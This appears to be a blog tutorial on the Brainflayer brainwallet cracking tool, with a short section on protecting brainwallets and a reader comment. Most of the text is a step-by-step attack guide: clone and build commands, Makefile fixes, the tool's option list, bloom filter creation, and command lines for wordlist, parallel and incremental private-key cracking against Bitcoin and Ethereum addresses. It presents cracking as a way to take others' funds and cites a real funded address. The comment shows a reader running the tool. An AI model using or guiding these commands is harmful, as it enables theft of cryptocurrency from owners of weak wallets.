Brainflayer: The Best Brainwallet Cracking Tool

1
10294

Brainflayer is a Proof-of-Concept brainwallet cracking tool that uses libsecp256k1 for pubkey generation. It was originally released as part of a DEFCON talk about cracking brainwallets. The released video is available at the end of the article.

Many researchers have spotted that cryptocurrency users are using guessable private keys to store their bitcoin and ethereum. Brainflayer can monitor thousands of private keys in seconds. If you know the private key then you own all bitcoins and ethereums in it.

Blockchain hackers are using such methods and they have stolen more than 50$ million in ethereum.

What is a private key?

A private key in the context of Bitcoin or Ethereum is a secret number that allows the crypto-coins to be spent. Every crypto-wallet contains one or more private keys, which are saved in the wallet file. Crypto-addresses are derived mathematically from the private keys.

Because the private key is the “ticket” that allows someone to spend bitcoins, it is important that these are kept secret and safe. Private keys can be kept on computer files, but are also often written on paper.

A bitcoin private key is a 256-bit number. An example in hexadecimal is the following :

5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8

From the above private key, the following public addresses are derived mathematically:

16ga2uqnF1NqpAuQeeg7sTCAdtDUwDyJav  #The address seems to have been used lately at 2019-03-13
16qVRutZ7rZuPx7NMtapvZorWYjyaME2Ue 

If you are more interested in the maths behind bitcoin, then check hackernoon’s article about elliptic curve cryptography.

Private keys themselves are almost never handled by the user, instead, the user will typically be given a seed phrase that encodes the same information as private keys.

Ethereum Seed Phrase
Ethereum Seed Phrase

What is a Brainwallet?

A brain wallet is a standard wallet that the private key and relative public addresses are created by a hashed passphrase. The SHA-256 algorithm is regularly used by brainwallets as it produced 256-bit string which is the exact size as bitcoin’s private key.

Bitcoin Brainwallet Generator
Bitcoin Brainwallet Generator

In the above brainwallet generator, the word “password” is used as the secret passphrase. It is already mentioned that bitcoin address: 16ga2uqnF1NqpAuQeeg7sTCAdtDUwDyJav is used lately and it has in total received 0.356 BTC.

Hashed SHA256 "Password" Bitcoin Address
Hashed SHA256 “password” Bitcoin Address

It is obvious that you must not use brainwallets with seed phrases that are generated by a human.

Bruteforce can crack even the most difficult human-generated passphrases. 

List of most known brainwallets :

How to Install Brainflayer

The following commands can be used to install brainflayer and the required dependencies on Kali or Ubuntu.

#apt-get install git
#git clone https://github.com/ryancdotorg/brainflayer.git
#apt-get install openssl
#apt-get install libgmp3-dev 
#apt-get install libimobiledevice-dev libplist-dev libusbmuxd-dev libssl-dev zlib1g-dev
#apt-get install dh-autoreconf
#cd brainflayer/
#make

Compile Error Handling

A lot of people are troubled with compilations errors. The following changes on the Makefile file will help to overcome the errors.

change : 
LIBS = -lssl -lrt -lcrypto -lz -lgmp
 to   : 
LIBS = -lssl -lrt -lcrypto -lz -lgmp -lpthread
and
remove all "-static" like :
$(COMPILE) -static $^ $(LIBS) -o $@
 to
$(COMPILE)  $^ $(LIBS) -o $@

The Man of Brainflayer

When everything is compiled, run it the flag -h for listing the available running options.

root@lab:/# brainflayer -h
Usage: brainflayer [OPTION]...

 -a                          open output file in append mode
 -b FILE                     check for matches against bloom filter FILE
 -f FILE                     verify matches against sorted hash160s in FILE
 -i FILE                     read from FILE instead of stdin
 -o FILE                     write to FILE instead of stdout
 -c TYPES                    use TYPES for public key to hash160 computation
                             multiple can be specified, for example the default
                             is 'uc', which will check for both uncompressed
                             and compressed addresses using Bitcoin s algorithm
                             u - uncompressed address
                             c - compressed address
                             e - ethereum address
                             x - most signifigant bits of x coordinate
 -t TYPE                     inputs are TYPE - supported types:
                             sha256 (default) - classic brainwallet
                             sha3   - sha3-256
                             priv   - raw private keys (requires -x)
                             warp   - WarpWallet (supports -s or -p)
                             bwio   - brainwallet.io (supports -s or -p)
                             bv2    - brainv2 (supports -s or -p) VERY SLOW
                             rush   - rushwallet (requires -r) FAST
                             keccak - keccak256 (ethercamp/old ethaddress)
                             camp2  - keccak256 * 2031 (new ethercamp)
 -x                          treat input as hex encoded
 -s SALT                     use SALT for salted input types (default: none)
 -p PASSPHRASE               use PASSPHRASE for salted input types, inputs
                             will be treated as salts
 -r FRAGMENT                 use FRAGMENT for cracking rushwallet passphrase
 -I HEXPRIVKEY               incremental private key cracking mode, starting
                             at HEXPRIVKEY (supports -n) FAST
 -k K                        skip the first K lines of input
 -n K/N                      use only the Kth of every N input lines
 -B                          batch size for affine transformations
                             must be a power of 2 (default/max: 4096)
 -w WINDOW_SIZE              window size for ecmult table (default: 16)
                             uses about 3 * 2^w KiB memory on startup, but
                             only about 2^w KiB once the table is built
 -m FILE                     load ecmult table from FILE
                             the ecmtabgen tool can build such a table
 -v                          verbose - display cracking progress
 -h                          show this help

Create the Bloom Filter

According to Wikipedia, bloom filter is a space-efficient probabilistic data structure that is used to test whether an element exists in a set. False-positive matches are possible, but false negatives are not. In our case, there is a very small chance brainflayer that will return a  cracked wallet that it is not actually cracked.

The next step is the creation of the bloom filter. A file which lists one bitcoin address per line is required. Then, addresses should be converted to Hash160 addresses. Finally, execute the following command :

$hex2blf btcaddress.hex btcaddress.blf

For Ethereum bloom filter creation, no hash160 conversion is required.

Crack Bitcoin via Wordlist

After the bloom filter creation, everything is ready for brute-forcing. Grab your longest wordlist and attack! The following commands are the most common ones:

$brainflayer -v -b btc.blf -i wordlist.txt
$brainflayer -t sha3 -v -b btc.blf -i wordlist.txt
$brainflayer -t bwio -v -b btc.blf -i wordlist.txt

The sha256 algorithm is the default option.

Crack Ethereum via Wordlist

Similarly, the most common cracking options for ethereum are the following:

$brainflayer  -t sha3 -c e -v -b eth.blf -i wordlist.txt
$brainflayer -t keccak -c e -v -b eth.blf -i wordlist.txt
$brainflayer -t sha256 -c e -v -b eth.blf -i wordlist.txt

Parallel Cracking

Brainflayer does not support multi-thread functionality. For parallel cracking, you should run multiple instances with different  -n parameter.

$brainflayer -v -n 1/3  -b btc.blf -i password.txt
$brainflayer -v -n 2/3  -b btc.blf -i password.txt
$brainflayer -v -n 3/3  -b btc.blf -i password.txt

Private Key Scanner

Brainflayer supports cracking via incremental private keys with option -I . This method is extremely fast. A single modern core can scan more than 700.000 private keys per second.

$brainflayer  -c e -v -b eth.blf -I 0000000000000000000000000000000000000000000000000000000000000001

Brainflayer Def Con Video

If you are still not satisfied, check for more information on def con video.

Brainflayer and Windows 10

In short, brainflayer is a tool that is designed for Linux operative system. There is the option to run brainflayer on Windows with WSL-Kali Linux. If you are interested in how to install and setup WSL-Kali on Windows click here.

The installation process of brainflayer on WSL-Kali is similar to normal Kali.

How to protect your brainwallet

The easiest way to protect yourself is by not using brainwallets. In case you still want to use one, then you must use a big complex random non-human generated seed as the input. Moreover, you have to ensure that the brainwallet is trusted and uses the best hashing algorithms (SHA256, SHA512 etc) multiple times to hash your seed.

Last but not least, users must never create or use a non-random bitcoin private key.

1 COMMENT

  1. HI

    rate: 271507.09 p/s found: 1/1434451968 elapsed: 5183.234 s

    p/s found is 1
    i only pasted 1 address’s base58 in btc address.hex then converted to bloomfilter( blf )
    does it means it got the private key or bits of signature of that address
    however it is still running should i stop it
    or how do i get the output
    Thanks

LEAVE A REPLY

Please enter your comment!
Please enter your name here